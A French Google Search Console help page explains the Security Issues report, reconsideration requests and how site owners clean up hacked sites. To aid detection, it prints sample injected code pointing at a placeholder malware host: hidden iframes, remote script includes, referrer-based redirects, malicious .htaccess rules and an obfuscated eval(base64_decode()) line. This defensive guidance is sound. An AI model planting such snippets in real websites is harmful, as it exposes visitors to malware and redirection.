Rapport sur les problèmes de sécurité

Si une évaluation Google détermine que votre site a été piraté ou qu'il présente un comportement susceptible de nuire à des internautes ou à leur ordinateur, le rapport sur les problèmes de sécurité met en avant les éléments identifiés par Google. Il peut s'agir, par exemple, d'attaques par hameçonnage ou de l'installation d'un logiciel malveillant ou indésirable sur l'ordinateur d'un utilisateur

Les pages ou les sites concernés par un problème de sécurité peuvent être accompagnés d'un message d'avertissement dans les résultats de la recherche, ou le navigateur peut afficher une page d'avertissement interstitielle lorsqu'un internaute tente d'y accéder.

Ouvrir le rapport sur les problèmes de sécurité

 

Quels sont les différents types de problèmes de sécurité ?

Les problèmes de sécurité entrent dans les catégories suivantes :

  • Contenu piraté : tout contenu placé sur votre site sans votre autorisation, en raison de failles de sécurité sur votre site Web. Pour protéger les internautes, Google s'efforce d'exclure le contenu piraté de ces résultats. En savoir plus
  • Logiciels malveillants et logiciels indésirables : logiciels conçus pour endommager un appareil ou nuire à ses utilisateurs et qui se livrent à des pratiques trompeuses ou inattendues. En savoir plus
  • Ingénierie sociale : contenu qui amène les visiteurs à effectuer une action dangereuse, comme révéler des informations confidentielles ou télécharger un logiciel. En savoir plus

Est-ce que des problèmes de sécurité affectent mon site ?

Si votre site présente des problèmes de sécurité, le nombre de problèmes de sécurité identifiés sur celui-ci s'affiche en haut du rapport.

Si votre site ne présente aucun problème de sécurité, une coche verte et un message approprié s'affichent.

Mais je viens d'acheter ce site !

Si vous avez récemment acheté un site présentant des problèmes de sécurité préexistants, corrigez les problèmes répertoriés dans le rapport sur les problèmes de sécurité, puis indiquez-nous dans la demande de réexamen que vous avez récemment acheté ce site et qu'il respecte désormais les Consignes Google aux webmasters.

Quelles sont les pages concernées ?

Développez une description du problème pour afficher une liste d'exemples d'URL affectées. Cette liste n'est pas nécessairement exhaustive. Elle présente uniquement un échantillon de pages de votre site concernées par le problème sélectionné. Parfois, certains problèmes de sécurité ne sont associés à aucun exemple d'URL. Cela ne signifie pas qu'aucune page n'est concernée, mais seulement que nous ne sommes pas parvenus à générer des échantillons pour une raison quelconque.

Les détails du problème présentent la date à laquelle celui-ci a été détecté pour la première fois sur votre site, ainsi qu'une brève description et un lien permettant d'en savoir plus.

Corriger le problème

Pour résoudre un problème de sécurité sur votre site :

  1. Développez la description du problème dans le rapport sur les problèmes de sécurité.
  2. Lisez la description du problème, puis suivez le lien "En savoir plus" pour obtenir des informations détaillées et découvrir les étapes à suivre pour le résoudre. Notez que les liens "En savoir plus" renvoient aux descriptions indiquées plus bas sur cette page.
  3. Appuyez-vous sur l'échantillon de pages fourni dans la section "Détails" pour résoudre le problème. Cette liste n'est pas nécessairement exhaustive. Elle présente uniquement un échantillon de pages de votre site concernées par le problème sélectionné. Il peut arriver que certains problèmes de sécurité ne soient associés à aucun exemple d'URL. Cela ne signifie pas qu'aucune page n'est concernée, mais seulement que nous ne sommes pas parvenus à générer des échantillons pour une raison quelconque.
  4. Corrigez le problème sur tout votre site. Il ne suffit pas de résoudre les problèmes sur certaines pages uniquement pour réapparaître partiellement dans les résultats de recherche.
  5. Si le rapport répertorie plusieurs problèmes de sécurité affectant votre site, corrigez-les tous.
  6. Vérifiez que vous avez corrigé tous les problèmes.
  7. Lorsque tous les problèmes répertoriés dans le rapport sont résolus sur toutes les pages, sélectionnez Demander un examen dans le rapport sur les problèmes de sécurité. Dans la demande de réexamen, décrivez les corrections apportées. Voici trois étapes clés à suivre pour vous assurer que votre demande est complète :
    • Expliquez précisément le problème de qualité identifié sur votre site.
    • Décrivez les mesures prises pour résoudre le problème.
    • Documentez les résultats de vos efforts.
  8. L'examen de votre demande peut prendre une semaine ou deux. Nous vous informerons de l'avancement par e-mail. Lorsque vous nous envoyez une demande, vous recevez un message de confirmation vous informant que l'examen est en cours. N'envoyez pas d'autre demande avant de connaître l'issue de cet examen.

Combien de temps prend le processus de réexamen ?

Entre une et deux semaines, maximum. Nous vous envoyons un e-mail lorsque nous recevons votre demande afin que vous sachiez qu'elle est active. Vous recevez également un e-mail lorsque l'examen est terminé.

Veuillez ne pas envoyer d'autre demande avant de connaître l'issue de l'examen en cours. Le fait de soumettre une demande de réexamen alors que le problème n'a pas été résolu peut ralentir le traitement de la demande suivante. Vous pouvez même être marqué comme récidiviste.

Liste des problèmes de sécurité

Voici une liste des problèmes de sécurité possibles, avec des informations sur la façon de les résoudre.

Pages trompeuses

Votre site présente du contenu qui amène les visiteurs à effectuer une action dangereuse, comme révéler des informations confidentielles ou télécharger un logiciel. La navigation sécurisée Google protège les internautes en les mettant en garde lorsqu'ils sont sur le point de consulter une page connue pour présenter du contenu trompeur.

Les pages Web sont considérées comme trompeuses lorsqu'elles :

  • se font passer pour une entité de confiance (ou y ressemblent), comme votre propre appareil ou navigateur, ou le site Web lui-même ; ou
  • vous incitent à effectuer une action que vous ne feriez que si vous y étiez invité par une entité de confiance, comme communiquer votre mot de passe, appeler un service d'assistance technique ou télécharger un logiciel.

Ce type de contenu trompeur est appelé ingénierie socialeEn savoir plus sur l'ingénierie sociale ou voir des exemples de pages trompeuses

Corriger le problème

1. Confirmer le problème

Consultez les exemples de pages pour rechercher le contenu trompeur. Vous pouvez utiliser l'outil d'inspection d'URL pour voir comment votre site s'affiche sur un mobile et sur un ordinateur.

2. Corriger les pages

Corrigez les pages qui utilisent des pratiques d'ingénierie sociale. Si vous pensez que la fonction de navigation sécurisée a classé une page Web par erreur, veuillez le signaler ici.

3. Demander un examen

Une fois que vous confirmez que le problème est résolu sur votre site, demandez un examen dans le rapport sur les problèmes de sécurité. Ce type d'examen peut prendre entre quelques jours et quelques semaines.

Ressources intégrées trompeuses

Votre site contient des publicités ou des ressources intégrées trompeuses qui amènent les visiteurs à effectuer une action dangereuse, comme révéler des informations confidentielles ou télécharger un logiciel indésirable. Du contenu trompeur peut figurer dans des ressources intégrées à la page, comme des images, des annonces ou d'autres composants tiers. La navigation sécurisée Google protège les internautes en les mettant en garde lorsqu'ils sont sur le point de consulter une page connue pour présenter du contenu trompeur.

Parfois, les internautes peuvent voir ce contenu sur la page hôte. Dans d'autres cas, le site hôte ne contient pas d'annonces visibles, mais conduit les internautes vers des pages malveillantes via des fenêtres pop-up ou pop-under, ou d'autres types de redirections. Quoi qu'il en soit, l'identification de ce type de contenu intégré induit un non-respect des règles pour la page hôte.

Ce type de contenu trompeur est appelé ingénierie socialeEn savoir plus sur l'ingénierie sociale ou voir des exemples de ressources intégrées trompeuses

Corriger le problème

1. Confirmer le problème

Consultez les exemples de pages pour rechercher le contenu trompeur. Vérifiez qu'aucune annonce, image ou autre ressource tierce intégrée sur les pages de votre site n'est trompeuse. Sachez que les réseaux publicitaires peuvent effectuer un roulement des annonces sur les pages de votre site. Ainsi, il vous faudra peut-être actualiser une page plusieurs fois avant de voir s'afficher d'éventuelles annonces d'ingénierie sociale. Certaines annonces peuvent s'afficher différemment sur les appareils mobiles et les ordinateurs de bureau. Vous pouvez utiliser l'outil d'inspection d'URL pour voir comment votre site s'affiche sur un mobile et sur un ordinateur.

2. Supprimer les annonces ou ressources trompeuses

Vérifiez les ressources tierces présentes sur votre site. Assurez-vous que les annonces, les images et autres ressources tierces intégrées aux pages de votre site ne sont pas trompeuses. Corrigez les pages qui utilisent des pratiques d'ingénierie sociale

3. Demander un examen

Une fois que vous confirmez que le problème est résolu sur votre site, demandez un examen dans le rapport sur les problèmes de sécurité. Ce type d'examen peut prendre entre quelques jours et quelques semaines.

Logiciels malveillants
Votre site a été infecté par le logiciel malveillant d'un hacker ou héberge ce type de logiciel. Un logiciel malveillant est un logiciel ou une application mobile conçus spécialement pour endommager un ordinateur ou un appareil mobile, perturber le fonctionnement du programme qu'il ou elle exécute, ou nuire à ses utilisateurs.

1. Déterminer si le problème peut être résolu

Pour résoudre un problème de logiciel malveillant, vous devez connaître le code et, éventuellement, les configurations des serveurs Web de votre site. Si vous ne vous sentez pas à l'aise avec cette tâche, lisez l'article Mettre en place une équipe d'assistance pour savoir comment trouver de l'aide.

2. Diagnostiquer et corriger le problème de logiciel malveillant

Il existe de nombreux types de logiciels malveillants. Lisez les sections suivantes pour trouver celui vous concerne et corriger le problème. Notez que votre site peut être infecté par plusieurs types de logiciels malveillants. Soyez minutieux lors du diagnostic et du nettoyage du site.

Type de logiciel malveillant : configuration du serveur

Description

Un hacker a modifié votre site de confiance afin que les visiteurs soient redirigés vers son site piraté contenant un logiciel malveillant, probablement en modifiant les fichiers de configuration de votre serveur. Les fichiers de configuration de serveur permettent en général à l'administrateur du site de spécifier les URL de redirection pour des pages ou des répertoires spécifiques d'un site Web. Par exemple, sur les serveurs Apache, il s'agit des fichiers .htaccess et httpd.conf.

Résoudre le problème

1. Confirmer le problème

Consultez quelques exemples d'URL figurant dans le rapport sur les problèmes de sécurité.

Évitez d'utiliser un navigateur pour afficher directement les pages infectées de votre site.

Étant donné que les logiciels malveillants se propagent en exploitant les failles des navigateurs, ouvrir une page infectée par un logiciel malveillant dans un navigateur peut endommager votre ordinateur. De plus, les pirates informatiques peuvent masquer le spam via des techniques de dissimulation (cloacking) afin d'empêcher les propriétaires de site de détecter ce type de contenu.

Deux autres options s'offrent à vous pour afficher le contenu sur un ordinateur de manière plus sécurisée :

  • Utilisez l'outil d'inspection d'URL pour afficher votre page tel que Google la voit. Il est très utile, sachant que de nombreux pirates informatiques effectuent des modifications visibles uniquement sur les machines Google. Par exemple, ils peuvent ajouter sur votre site des liens qui renvoient vers le leur et qui sont uniquement visibles lorsque le site référent est Google.
  • Utilisez les commandes cURL ou Wget pour exécuter des requêtes HTTP (telles que l'exploration d'une page) à partir de la ligne de commande. Ces outils disponibles gratuitement sont utiles pour diagnostiquer les URL de redirection et sont en mesure d'inclure des informations concernant des URL de provenance ou des user-agents. Les pirates informatiques attaquent souvent des user-agents ou des URL de provenance très spécifiques pour éviter d'être détectés et pour sélectionner les cibles les plus vulnérables. Le recours à ces outils vous permet de simuler une cible. Essayez d'utiliser différentes URL de provenance (telles que des liens d'importants sites Web ou de moteurs de recherche distincts) si votre requête ne provoque pas le comportement indésirable. Par exemple, pour simuler un utilisateur qui suit un lien provenant des résultats de recherche Google et qui est renvoyé vers www.example.com/page.html sur un ordinateur Windows, vous utiliseriez la commande cURL suivante :

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Voici les en-têtes que peuvent inclure les réponses d'une page infectée par une "configuration de serveur" :

…
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 24 Feb 2013 21:06:45 GMT
< Server: Apache
< Location: http://<malware-attack-site>/index.html
< Content-Length: 253
...

2. Supprimer le logiciel malveillant de type "configuration du serveur" de votre site

Connectez-vous à votre serveur via l'interface système ou le terminal (le site peut être mis hors connexion au besoin) et examinez les fichiers de configuration pertinents du serveur. Il se peut que plusieurs fichiers de configuration de serveur soient piratés sur votre site. Vérifiez les instructions indésirables contenues dans ces fichiers, telles que les redirections, dans lesquelles le hacker peut rediriger l'internaute vers des sites pirates malveillants inconnus. Par exemple, dans le fichier .htaccess, vous pouvez voir une redirection comme celle-ci :

RewriteEngine On 
RewriteCond %{HTTP_REFERER} .*google.* 
RewriteRule ^third-page.html($|/) http://<malware-site>/index.html [R=301]

 

En outre :

  • Vérifiez bien l'intégralité du fichier au cas où le pirate informatique aurait ajouté son code à la fin, où il passe plus facilement inaperçu.
  • Explorez les tâches cron potentielles créées par le pirate informatique afin de continuellementmettre à jour le fichier .htaccess. Les tâches cron peuvent être répertoriées dans divers emplacements, y compris /etc/crontab (ainsi que dans de nombreux répertoires /etc/cron*) et /var/spool/cron.
  • Lisez le guide sur le piratage pour découvrir comment résoudre complètement le problème, avec des étapes de nettoyage et des conseils afin d'éviter que votre site ne soit à nouveau piraté.
Type de logiciel malveillant : injection SQL

Description

Un hacker a probablement compromis la base de données de votre site. Par exemple, il peut avoir ajouté du code malveillant dans tous les enregistrements d'un tableau de base de données. Dans ce cas, lorsque le serveur charge une page nécessitant des informations issues de la base de données, le code malveillant est désormais intégré au contenu de la page et peut nuire aux visiteurs du site.

Résoudre le problème

1. Confirmer le problème

Exécutez des requêtes au niveau des URL concernées dans la ligne de commande et examinez la réponse pour des termes d'attaque SQL, comme "iframe" ou "eval".

Évitez d'utiliser un navigateur pour afficher directement les pages infectées de votre site.

Étant donné que les logiciels malveillants se propagent en exploitant les failles des navigateurs, ouvrir une page infectée par un logiciel malveillant dans un navigateur peut endommager votre ordinateur. De plus, les pirates informatiques peuvent masquer le spam via des techniques de dissimulation (cloacking) afin d'empêcher les propriétaires de site de détecter ce type de contenu.

Deux autres options s'offrent à vous pour afficher le contenu sur un ordinateur de manière plus sécurisée :

  • Utilisez l'outil d'inspection d'URL pour afficher votre page tel que Google la voit. Il est très utile, sachant que de nombreux pirates informatiques effectuent des modifications visibles uniquement sur les machines Google. Par exemple, ils peuvent ajouter sur votre site des liens qui renvoient vers le leur et qui sont uniquement visibles lorsque le site référent est Google.
  • Utilisez les commandes cURL ou Wget pour exécuter des requêtes HTTP (telles que l'exploration d'une page) à partir de la ligne de commande. Ces outils disponibles gratuitement sont utiles pour diagnostiquer les URL de redirection et sont en mesure d'inclure des informations concernant des URL de provenance ou des user-agents. Les pirates informatiques attaquent souvent des user-agents ou des URL de provenance très spécifiques pour éviter d'être détectés et pour sélectionner les cibles les plus vulnérables. Le recours à ces outils vous permet de simuler une cible. Essayez d'utiliser différentes URL de provenance (telles que des liens d'importants sites Web ou de moteurs de recherche distincts) si votre requête ne provoque pas le comportement indésirable. Par exemple, pour simuler un utilisateur qui suit un lien provenant des résultats de recherche Google et qui est renvoyé vers www.example.com/page.html sur un ordinateur Windows, vous utiliseriez la commande cURL suivante :

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Connectez-vous ensuite au serveur de base de données ou affichez votre base de données à l'aide d'un outil comme phpMyAdmin. Si vous avez utilisé les commandes Wget ou cURL, essayez de corréler les dommages détectés dans le code source de la page à travers les commandes Wget ou cURL avec les entrées réelles de la base de données. Par exemple, si vos pages contiennent un iFrame malveillant, vous pouvez rechercher du code "iframe" au moyen d'une requête SQL. Par exemple :

SELECT * FROM blog_posts WHERE post_text LIKE '%>iframe%'; 

Vous pouvez également rechercher des activités inhabituelles dans les journaux des bases de données et les fichiers d'erreur, comme les commandes SQL inattendues qui semblent être anormales pour les erreurs ou les internautes habitués.

2. Nettoyer le site

Lorsque vous êtes prêt à nettoyer votre site, vous pouvez soit mettre à jour tous les enregistrements de la base de données infectée, soit restaurer votre dernière sauvegarde de base de données connue.

En outre :

  • Lisez le guide sur le piratage pour découvrir comment résoudre complètement le problème, avec des étapes de nettoyage et des conseils afin d'éviter que votre site ne soit à nouveau piraté.
Type de logiciel malveillant : injection de code

Description

Les pages de votre site ont été modifiées pour inclure du code malveillant, tel qu'un iFrame vers un site pirate contenant un logiciel malveillant.

Résoudre le problème

1. Confirmer le problème

Consultez les URL répertoriées comme infectées dans le rapport sur les problèmes de sécurité. Examinez le code HTML des réponses à la recherche de code malveillant.

Évitez d'utiliser un navigateur pour afficher directement les pages infectées de votre site.

Étant donné que les logiciels malveillants se propagent en exploitant les failles des navigateurs, ouvrir une page infectée par un logiciel malveillant dans un navigateur peut endommager votre ordinateur. De plus, les pirates informatiques peuvent masquer le spam via des techniques de dissimulation (cloacking) afin d'empêcher les propriétaires de site de détecter ce type de contenu.

Deux autres options s'offrent à vous pour afficher le contenu sur un ordinateur de manière plus sécurisée :

  • Utilisez l'outil d'inspection d'URL pour afficher votre page tel que Google la voit. Il est très utile, sachant que de nombreux pirates informatiques effectuent des modifications visibles uniquement sur les machines Google. Par exemple, ils peuvent ajouter sur votre site des liens qui renvoient vers le leur et qui sont uniquement visibles lorsque le site référent est Google.
  • Utilisez les commandes cURL ou Wget pour exécuter des requêtes HTTP (telles que l'exploration d'une page) à partir de la ligne de commande. Ces outils disponibles gratuitement sont utiles pour diagnostiquer les URL de redirection et sont en mesure d'inclure des informations concernant des URL de provenance ou des user-agents. Les pirates informatiques attaquent souvent des user-agents ou des URL de provenance très spécifiques pour éviter d'être détectés et pour sélectionner les cibles les plus vulnérables. Le recours à ces outils vous permet de simuler une cible. Essayez d'utiliser différentes URL de provenance (telles que des liens d'importants sites Web ou de moteurs de recherche distincts) si votre requête ne provoque pas le comportement indésirable. Par exemple, pour simuler un utilisateur qui suit un lien provenant des résultats de recherche Google et qui est renvoyé vers www.example.com/page.html sur un ordinateur Windows, vous utiliseriez la commande cURL suivante :

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Voici quelques exemples de code malveillant :

  • iFrame qui charge un site malveillant :
    <iframe frameborder="0" height="0" src="http://<malware-site>/path/file" 
      style="display:none" width="0"></iframe>
  • Langage JavaScript ou autre langage de script qui appelle et exécute des scripts provenant d'un site pirate :
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • Script qui redirige le serveur vers un site pirate :
    <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://<malware-site>/");
      }
    </script>
  • Code malveillant dissimulé pour ne pas être détecté :
    eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • Fichiers d'objets partagés conçus pour écrire de façon aléatoire un code malveillant sur des scripts non infectés :
    #httpd.conf modified by the hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

Recherchez tous les codes malveillants qui peuvent se trouver sur le site. Il peut être utile de rechercher des mots comme "iframe" pour trouver le code correspondant. Recherchez aussi d'autres mots clés comme "script", "eval" et "unescape". Par exemple, pour rechercher "iframe" dans tous les fichiers sur un système Unix :

$grep -irn "iframe" ./ | less

2. Nettoyer le site

Lorsque vous êtes prêt à nettoyer votre site, vous pouvez remplacer les fichiers concernés par la dernière sauvegarde non infectée ou supprimer l'injection de code de chaque page ainsi que toutes les fonctions ou tous les fichiers de script associés. Si vous avez modifié des fichiers de configuration du serveur, vous devrez peut-être redémarrer votre serveur Web pour que les modifications prennent effet.

En outre :

  • Lisez le guide sur le piratage pour découvrir comment résoudre complètement le problème, avec des étapes de nettoyage et des conseils afin d'éviter que votre site ne soit à nouveau piraté.
Type de logiciel malveillant : modèle d'erreur

Description

Le modèle utilisé pour les messages d'erreur, tel que 404 Fichier introuvable, est configuré pour distribuer un logiciel malveillant. De cette façon, les hackers peuvent pirater des URL qui n'existent même pas sur votre site.

Résoudre le problème

1. Confirmer le problème

Demandez une page de votre site qui n'existe pas ou qui génère un autre type d'erreur, puis examinez la réponse pour voir si elle provient d'un autre site ou si elle contient un autre programme malveillant.

Évitez d'utiliser un navigateur pour afficher directement les pages infectées de votre site.

Étant donné que les logiciels malveillants se propagent en exploitant les failles des navigateurs, ouvrir une page infectée par un logiciel malveillant dans un navigateur peut endommager votre ordinateur. De plus, les pirates informatiques peuvent masquer le spam via des techniques de dissimulation (cloacking) afin d'empêcher les propriétaires de site de détecter ce type de contenu.

Deux autres options s'offrent à vous pour afficher le contenu sur un ordinateur de manière plus sécurisée :

  • Utilisez l'outil d'inspection d'URL pour afficher votre page tel que Google la voit. Il est très utile, sachant que de nombreux pirates informatiques effectuent des modifications visibles uniquement sur les machines Google. Par exemple, ils peuvent ajouter sur votre site des liens qui renvoient vers le leur et qui sont uniquement visibles lorsque le site référent est Google.
  • Utilisez les commandes cURL ou Wget pour exécuter des requêtes HTTP (telles que l'exploration d'une page) à partir de la ligne de commande. Ces outils disponibles gratuitement sont utiles pour diagnostiquer les URL de redirection et sont en mesure d'inclure des informations concernant des URL de provenance ou des user-agents. Les pirates informatiques attaquent souvent des user-agents ou des URL de provenance très spécifiques pour éviter d'être détectés et pour sélectionner les cibles les plus vulnérables. Le recours à ces outils vous permet de simuler une cible. Essayez d'utiliser différentes URL de provenance (telles que des liens d'importants sites Web ou de moteurs de recherche distincts) si votre requête ne provoque pas le comportement indésirable. Par exemple, pour simuler un utilisateur qui suit un lien provenant des résultats de recherche Google et qui est renvoyé vers www.example.com/page.html sur un ordinateur Windows, vous utiliseriez la commande cURL suivante :

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

2. Nettoyer le site

Connectez-vous à votre serveur Web et recherchez les directives de page d'erreur dans les fichiers de configuration de votre serveur. Par exemple, le modèle d'erreur des serveurs Web Apache peut être déclaré dans le fichier .htaccess. Voici un exemple d'entrée de fichier .htaccess qui extrait les pages d'erreur 404 d'un site malveillant :

ErrorDocument 404 http://<malware-site>/index.html 

Lorsque vous êtes prêt à nettoyer votre site, vous pouvez remplacer les fichiers .htaccess par une sauvegarde non infectée connue ou supprimer les directives ErrorDocument indésirables dans les fichiers .htaccess existants. Veillez également à effacer les fichiers d'erreur réels si votre site en contient. Enfin, redémarrez votre serveur Web pour vous assurer que toutes les modifications prennent effet.

En outre :

  • Lisez le guide sur le piratage pour découvrir comment résoudre complètement le problème, avec des étapes de nettoyage et des conseils afin d'éviter que votre site ne soit à nouveau piraté.
Type de logiciel malveillant : programme malveillant sur plusieurs sites

Description

Le site charge du contenu à partir d'un site Web réputé pour comporter du contenu malveillant. Dans Google Chrome, cela est signalé par un élément interstitiel dans le navigateur accompagné du dessin suivant :

cross-site malware warning

Résoudre le problème

  1. Confirmez le problème en recherchant quelques-uns des exemples d'URL répertoriés dans le rapport sur les problèmes de sécurité. Le graphique ci-dessus devrait apparaître s'il s'agit d'un logiciel malveillant sur plusieurs sites.
  2. L'avertissement du navigateur indique le domaine du contenu douteux. Supprimez toutes les références au site marqué répertoriées dans l'avertissement du navigateur.
  3. Si vous découvrez qu'une page de votre site inclut du contenu provenant d'un site marqué à votre insu, le problème est plus grave. Votre site a probablement été compromis. Quel que soit votre cas, nous vous recommandons de consulter le protocole de récupération contenu dans l'aide aux sites piratés pour mettre votre site en quarantaine, évaluer les dommages et nettoyer votre site.
  4. Après avoir supprimé tout le contenu d'ingénierie sociale de votre site, demandez un examen dans le rapport sur les problèmes de sécurité. Ce type d'examen peut prendre entre quelques jours et quelques semaines.
  5. Si vous avez intentionnellement inclus le contenu d'un site légitime qui a été marqué et que vous souhaitez le réinclure après le nettoyage du site marqué, vous pouvez surveiller l'état du site marqué via la page de diagnostic de la navigation sécurisée Google pour ce site (http://www.google.com/safebrowsing/diagnostic?site=www.example.com). Souvent, les sites légitimes sont nettoyés rapidement par leurs propriétaires.
Autres types de logiciels malveillants

De nombreux autres types de logiciels malveillants susceptibles peuvent affecter votre site. Consultez le site Web Fundamentals pour profiter de plus de conseils sur le diagnostic et la correction d'autres types de piratage. Après avoir corrigé votre site, assurez-vous de demander un examen.

3. Demander un examen

Une fois que vous confirmez que le problème est résolu sur votre site, demandez un examen dans le rapport sur les problèmes de sécurité. Ce type d'examen peut prendre entre quelques jours et quelques semaines.

Type de piratage : injection de code

Un hacker a compromis votre site et est en train d'injecter du code malveillant dans vos pages. Il peut, par exemple, s'agir de redirections vers un site malveillant ou de l'exécution d'un logiciel de minage de crypto-monnaies dans votre navigateur lorsque la page est ouverte.

1. Déterminer si le problème peut être résolu

Reportez-vous à l'article Mettre en place une équipe d'assistance afin de déterminer les efforts nécessaires pour résoudre le problème vous-même ou de découvrir comment trouver de l'aide si vous pensez ne pas avoir les compétences requises.

2. Confirmer le problème

Évitez d'utiliser un navigateur pour afficher directement les pages infectées de votre site.

Étant donné que les logiciels malveillants se propagent en exploitant les failles des navigateurs, ouvrir une page infectée par un logiciel malveillant dans un navigateur peut endommager votre ordinateur. De plus, les pirates informatiques peuvent masquer le spam via des techniques de dissimulation (cloacking) afin d'empêcher les propriétaires de site de détecter ce type de contenu.

Deux autres options s'offrent à vous pour afficher le contenu sur un ordinateur de manière plus sécurisée :

  • Utilisez l'outil d'inspection d'URL pour afficher votre page tel que Google la voit. Il est très utile, sachant que de nombreux pirates informatiques effectuent des modifications visibles uniquement sur les machines Google. Par exemple, ils peuvent ajouter sur votre site des liens qui renvoient vers le leur et qui sont uniquement visibles lorsque le site référent est Google.
  • Utilisez les commandes cURL ou Wget pour exécuter des requêtes HTTP (telles que l'exploration d'une page) à partir de la ligne de commande. Ces outils disponibles gratuitement sont utiles pour diagnostiquer les URL de redirection et sont en mesure d'inclure des informations concernant des URL de provenance ou des user-agents. Les pirates informatiques attaquent souvent des user-agents ou des URL de provenance très spécifiques pour éviter d'être détectés et pour sélectionner les cibles les plus vulnérables. Le recours à ces outils vous permet de simuler une cible. Essayez d'utiliser différentes URL de provenance (telles que des liens d'importants sites Web ou de moteurs de recherche distincts) si votre requête ne provoque pas le comportement indésirable. Par exemple, pour simuler un utilisateur qui suit un lien provenant des résultats de recherche Google et qui est renvoyé vers www.example.com/page.html sur un ordinateur Windows, vous utiliseriez la commande cURL suivante :

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Le hacker peut avoir injecté le code malveillant directement dans les fichiers HTML de votre site (en ajoutant une redirection JavaScript, par exemple) ou dans les fichiers qui génèrent le contenu de votre site (fichiers PHP, par exemple).

Explorez une page compromise répertoriée dans le rapport, puis examinez la réponse. Les hackers peuvent utiliser plusieurs techniques différentes pour rediriger les visiteurs de votre site vers les leurs. En voici quelques-unes :

  • Redirection :​
    • Redirections d'en-tête : les hackers peuvent rediriger les visiteurs en modifiant le ou les fichiers de configuration de votre serveur. Les fichiers de configuration de serveur permettent en général à l'administrateur du site de spécifier les URL de redirection pour des pages ou des répertoires spécifiques d'un site Web. Par exemple, sur les serveurs Apache, il s'agit des fichiers .htaccess et httpd.conf.
      …
      < HTTP/1.1 301 Moved Permanently
      < Date: Sun, 24 Feb 2013 21:06:45 GMT
      < Server: Apache
      < Location: http://<malware-site>/index.html
      < Content-Length: 253
    • Redirections JavaScript :
      <script>
        if (document.referrer.match(/google\.com/)) {
          window.location("http://<malware-site>/");}
      <script>
  • Code JavaScript malveillant chargé depuis un autre site :
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • Code malveillant dissimulé pour ne pas être détecté :
    eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

Rechercher tout code suspect dans vos réponses et sur votre site. Les termes de recherche utiles incluent "search", "eval", "base64_decode" et "unescape".

3. Nettoyer le site

Lorsque vous êtes prêt à nettoyer le site, vous pouvez soit remplacer les fichiers concernés par la dernière sauvegarde non infectée, soit supprimer le contenu indésirable vous-même.

En outre :

  • Lisez le guide sur le piratage pour découvrir comment résoudre complètement le problème, avec des étapes de nettoyage et des conseils afin d'éviter que votre site ne soit à nouveau piraté.

4. Demander un examen

Une fois que vous confirmez que le problème est résolu sur votre site, demandez un examen dans le rapport sur les problèmes de sécurité. Ce type d'examen peut prendre entre quelques jours et quelques semaines.

Type de piratage : injection de contenu

Un hacker a ajouté des liens ou du texte contenant du spam aux pages de votre site. Le contenu injecté peut comporter des termes pharmaceutiques ou d'autres types de spam sans rapport avec le contenu du site.

En règle générale, les pirates informatiques modifient votre site de l'une des manières suivantes :

  • En accédant à un répertoire non sécurisé sur votre serveur. Par exemple, il se peut que vous ayez un répertoire dont les autorisations sont ouvertes.
  • En exploitant une faille dans le logiciel en cours d'exécution sur votre site, tel qu'un système de gestion de contenu. Par exemple, vous utilisez peut-être une version plus ancienne et non sécurisée de Drupal, Joomla! ou WordPress.
  • En piratant des plug-ins tiers que vous utilisez sur votre site, comme un compteur de visiteurs.

1. Déterminer si le problème peut être résolu

Reportez-vous à l'article Mettre en place une équipe d'assistance afin de déterminer les efforts nécessaires pour résoudre le problème vous-même ou de découvrir comment trouver de l'aide si vous pensez ne pas avoir les compétences requises.

2. Confirmer le problème

Évitez d'utiliser un navigateur pour afficher directement les pages infectées de votre site.

Étant donné que les logiciels malveillants se propagent en exploitant les failles des navigateurs, ouvrir une page infectée par un logiciel malveillant dans un navigateur peut endommager votre ordinateur. De plus, les pirates informatiques peuvent masquer le spam via des techniques de dissimulation (cloacking) afin d'empêcher les propriétaires de site de détecter ce type de contenu.

Deux autres options s'offrent à vous pour afficher le contenu sur un ordinateur de manière plus sécurisée :

  • Utilisez l'outil d'inspection d'URL pour afficher votre page tel que Google la voit. Il est très utile, sachant que de nombreux pirates informatiques effectuent des modifications visibles uniquement sur les machines Google. Par exemple, ils peuvent ajouter sur votre site des liens qui renvoient vers le leur et qui sont uniquement visibles lorsque le site référent est Google.
  • Utilisez les commandes cURL ou Wget pour exécuter des requêtes HTTP (telles que l'exploration d'une page) à partir de la ligne de commande. Ces outils disponibles gratuitement sont utiles pour diagnostiquer les URL de redirection et sont en mesure d'inclure des informations concernant des URL de provenance ou des user-agents. Les pirates informatiques attaquent souvent des user-agents ou des URL de provenance très spécifiques pour éviter d'être détectés et pour sélectionner les cibles les plus vulnérables. Le recours à ces outils vous permet de simuler une cible. Essayez d'utiliser différentes URL de provenance (telles que des liens d'importants sites Web ou de moteurs de recherche distincts) si votre requête ne provoque pas le comportement indésirable. Par exemple, pour simuler un utilisateur qui suit un lien provenant des résultats de recherche Google et qui est renvoyé vers www.example.com/page.html sur un ordinateur Windows, vous utiliseriez la commande cURL suivante :

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

